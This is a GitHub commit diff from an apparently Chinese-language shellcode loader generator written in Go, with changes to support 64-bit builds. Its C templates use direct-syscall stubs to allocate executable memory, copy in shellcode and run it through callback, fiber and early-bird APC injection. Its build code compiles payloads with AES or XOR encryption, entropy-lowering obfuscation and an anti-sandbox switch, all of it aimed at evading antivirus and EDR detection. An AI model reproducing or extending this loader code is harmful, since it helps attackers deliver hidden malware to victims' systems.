修改了64位兼容的问题

fdx-xdf · Mar 30, 2024 · cb19e8a · cb19e8a
1 parent 238f9c3
commit cb19e8a
Show file tree

Hide file tree

Showing 11 changed files with 1,653 additions and 2,197 deletions.
diff --git a/Loader/Template.go b/Loader/Template.go
@@ -26,10 +26,10 @@ var __c__sandbox2 = `
 // 回调函数加载
 var __c__callback = `
     DWORD oldProtect;
-    VAVNtAllocateVirtualMemory(GetCurrentProcess(), &addr, 0, &allocationSize, MEM_COMMIT | MEM_RESERVE, 0x04);
-    VAVNtProtectVirtualMemory(GetCurrentProcess(),&addr, &allocationSize, 0x20, &oldProtect);	
-    VAVNtProtectVirtualMemory(GetCurrentProcess(),&addr, &allocationSize, 0x40, &oldProtect);	
-	VAVNtWriteVirtualMemory(GetCurrentProcess(), addr, xpp, length, NULL);
+    Sw3NtAllocateVirtualMemory(GetCurrentProcess(), &addr, 0, &allocationSize, MEM_COMMIT | MEM_RESERVE, 0x04);
+    Sw3NtProtectVirtualMemory(GetCurrentProcess(),&addr, &allocationSize, 0x20, &oldProtect);	
+    Sw3NtProtectVirtualMemory(GetCurrentProcess(),&addr, &allocationSize, 0x40, &oldProtect);	
+	Sw3NtWriteVirtualMemory(GetCurrentProcess(), addr, xpp, length, NULL);
 	EnumCalendarInfo((CALINFO_ENUMPROC)addr, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1);
 `
 var __c__earlyBird = `
@@ -43,20 +43,20 @@ var __c__earlyBird = `
 
     QueueUserAPC((PAPCFUNC)shellAddress, GetCurrentThread(), NULL);
     testAlert();
-    //VAVNtAllocateVirtualMemory(hProcess, &addr, 0, &allocationSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
-    //VAVNtWriteVirtualMemory(hProcess, addr, xpp, length, &bytesWritten);
+    //Sw3NtAllocateVirtualMemory(hProcess, &addr, 0, &allocationSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+    //Sw3NtWriteVirtualMemory(hProcess, addr, xpp, length, &bytesWritten);
     ////LPVOID addr1 = VirtualAlloc(NULL, sizeof(xpp), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
     ////RtlMoveMemory(addr1, xpp,length);
     ////QueueUserAPC((PAPCFUNC)addr1, GetCurrentThread(), NULL);
-	//VAVNtQueueApcThread(GetCurrentThread(),(PAPCFUNC)addr,NULL,NULL,NULL);
-    //VAVNtTestAlert();
+	//Sw3NtQueueApcThread(GetCurrentThread(),(PAPCFUNC)addr,NULL,NULL,NULL);
+    //Sw3NtTestAlert();
 `
 
 // 纤程加载
 var __c__fiber = `
     PVOID mainFiber = ConvertThreadToFiber(NULL);
-    VAVNtAllocateVirtualMemory(GetCurrentProcess(), &addr, 0, &allocationSize, MEM_COMMIT | MEM_RESERVE, 0x40);
-    VAVNtWriteVirtualMemory(GetCurrentProcess(), addr, xpp, length, NULL);
+    Sw3NtAllocateVirtualMemory(GetCurrentProcess(), &addr, 0, &allocationSize, MEM_COMMIT | MEM_RESERVE, 0x40);
+    Sw3NtWriteVirtualMemory(GetCurrentProcess(), addr, xpp, length, NULL);
 
     PVOID shellcodeFiber = CreateFiber(NULL, (LPFIBER_START_ROUTINE)addr, NULL);
 
@@ -108,7 +108,7 @@ var __c_xor = `
 #include <Windows.h>
 #include <stdio.h>
 #include <stdbool.h>
-#include "syscalls_common.h" 
+REPLACE_STSYSCALL_Framework
 #include <Rpc.h>
 
 typedef VOID(NTAPI* myNtTestAlert)(VOID);
@@ -163,7 +163,7 @@ var __c__aes = `
 #include <stdbool.h>
 #include <Windows.h>
 #include "aes.h"
-#include "syscalls_common.h"
+REPLACE_STSYSCALL_Framework
 
 REPLACE_ANTI_SANDBOX1
 char url1[] = "https://www.google.com/search?q=";

diff --git a/Loader/generateLoader.go b/Loader/generateLoader.go
diff --git a/Others/others.go b/Others/others.go
@@ -94,7 +94,7 @@ func Build(options *FlagOptions, outfile string, framework int) {
 		case "aes":
 			switch strings.ToLower(options.Obfuscation) {
 			case "uuid":
-				cmd := exec.Command("gcc", "-mwindows", "-m32", "-o", outexe, outfile, "syscalls_common.c", "aes.c", "-s", "-masm=intel", "-lrpcrt4")
+				cmd := exec.Command("gcc", "-mwindows", "-m32", "-o", outexe, outfile, "sys_32.c", "aes.c", "-s", "-masm=intel", "-lrpcrt4")
 				// 执行命令并等待其完成
 				err := cmd.Run()
 				if err != nil {
@@ -103,7 +103,7 @@ func Build(options *FlagOptions, outfile string, framework int) {
 				}
 				fmt.Printf("编译成功: " + outexe)
 			case "words":
-				cmd := exec.Command("gcc", "-mwindows", "-m32", "-o", outexe, outfile, "syscalls_common.c", "aes.c", "-s", "-masm=intel")
+				cmd := exec.Command("gcc", "-mwindows", "-m32", "-o", outexe, outfile, "sys_32.c", "aes.c", "-s", "-masm=intel")
 				// 执行命令并等待其完成
 				err := cmd.Run()
 				if err != nil {
@@ -115,7 +115,7 @@ func Build(options *FlagOptions, outfile string, framework int) {
 		case "xor":
 			switch strings.ToLower(options.Obfuscation) {
 			case "uuid":
-				cmd := exec.Command("g++", "-mwindows", "-m32", "-o", outexe, outfile, "syscalls_common.c", "-s", "-masm=intel", "-lrpcrt4")
+				cmd := exec.Command("g++", "-mwindows", "-m32", "-o", outexe, outfile, "sys_32.c", "-s", "-masm=intel", "-lrpcrt4")
 				// 执行命令并等待其完成
 				err := cmd.Run()
 				if err != nil {
@@ -124,7 +124,7 @@ func Build(options *FlagOptions, outfile string, framework int) {
 				}
 				fmt.Printf("编译成功: " + outexe)
 			case "words":
-				cmd := exec.Command("g++", "-mwindows", "-m32", "-o", outexe, outfile, "syscalls_common.c", "-s", "-masm=intel")
+				cmd := exec.Command("g++", "-mwindows", "-m32", "-o", outexe, outfile, "sys_32.c", "-s", "-masm=intel")
 				// 执行命令并等待其完成
 				err := cmd.Run()
 				if err != nil {
@@ -139,7 +139,7 @@ func Build(options *FlagOptions, outfile string, framework int) {
 		case "aes":
 			switch strings.ToLower(options.Obfuscation) {
 			case "uuid":
-				cmd := exec.Command("gcc", "-mwindows", "-m64", "-o", outexe, outfile, "syscalls_common.c", "aes.c", "-s", "-masm=intel", "-lrpcrt4")
+				cmd := exec.Command("gcc", "-mwindows", "-m64", "-o", outexe, outfile, "sys_64.c", "aes.c", "-s", "-masm=intel", "-lrpcrt4")
 				// 执行命令并等待其完成
 				err := cmd.Run()
 				if err != nil {
@@ -148,7 +148,7 @@ func Build(options *FlagOptions, outfile string, framework int) {
 				}
 				fmt.Printf("编译成功: " + outexe)
 			case "words":
-				cmd := exec.Command("gcc", "-mwindows", "-m64", "-o", outexe, outfile, "syscalls_common.c", "aes.c", "-s", "-masm=intel")
+				cmd := exec.Command("gcc", "-mwindows", "-m64", "-o", outexe, outfile, "sys_64.c", "aes.c", "-s", "-masm=intel")
 				// 执行命令并等待其完成
 				err := cmd.Run()
 				if err != nil {
@@ -160,7 +160,7 @@ func Build(options *FlagOptions, outfile string, framework int) {
 		case "xor":
 			switch strings.ToLower(options.Obfuscation) {
 			case "uuid":
-				cmd := exec.Command("g++", "-mwindows", "-m64", "-o", outexe, outfile, "syscalls_common.c", "-s", "-masm=intel", "-lrpcrt4")
+				cmd := exec.Command("g++", "-mwindows", "-m64", "-o", outexe, outfile, "sys_64.c", "-s", "-masm=intel", "-lrpcrt4")
 				// 执行命令并等待其完成
 				err := cmd.Run()
 				if err != nil {
@@ -169,7 +169,7 @@ func Build(options *FlagOptions, outfile string, framework int) {
 				}
 				fmt.Printf("编译成功: " + outexe)
 			case "words":
-				cmd := exec.Command("g++", "-mwindows", "-m64", "-o", outexe, outfile, "syscalls_common.c", "-s", "-masm=intel")
+				cmd := exec.Command("g++", "-mwindows", "-m64", "-o", outexe, outfile, "sys_64.c", "-s", "-masm=intel")
 				// 执行命令并等待其完成
 				err := cmd.Run()
 				if err != nil {

diff --git a/calc_shellcode_64.bin b/calc_shellcode_64.bin
diff --git a/main.go b/main.go
@@ -12,14 +12,14 @@ import (
 
 func Options() *Others.FlagOptions {
 	help := flag.Bool("h", false, "使用帮助")
-	inputFile := flag.String("i", "calc_shellcode.bin", "原始格式 Shellcode 的路径")
+	inputFile := flag.String("i", "shellcode.bin", "原始格式 Shellcode 的路径")
 	encryption := flag.String("enc", "aes", "Shellcode加密方式 (例如, aes, xor)")
 	language := flag.String("lang", "c", "加载器的语言")
 	outFile := flag.String("o", "Program", "输出文件")
 	keyLength := flag.Int("k", 16, "加密的密钥长度")
 	obfuscation := flag.String("obf", "words", "混淆 Shellcode 以降低熵值 (i.e.,uuid,words)")
-	framework := flag.Int("f", 32, "选择32位还是64位")
-	sandbox := flag.Bool("sandbox", true, "是否开启反沙箱模式")
+	framework := flag.Int("f", 64, "选择32位还是64位")
+	sandbox := flag.Bool("sandbox", false, "是否开启反沙箱模式")
 	loadingTechnique := flag.String("loading", "callback", "请选择加载方式，支持callback,fiber,earlybird")
 	flag.Parse()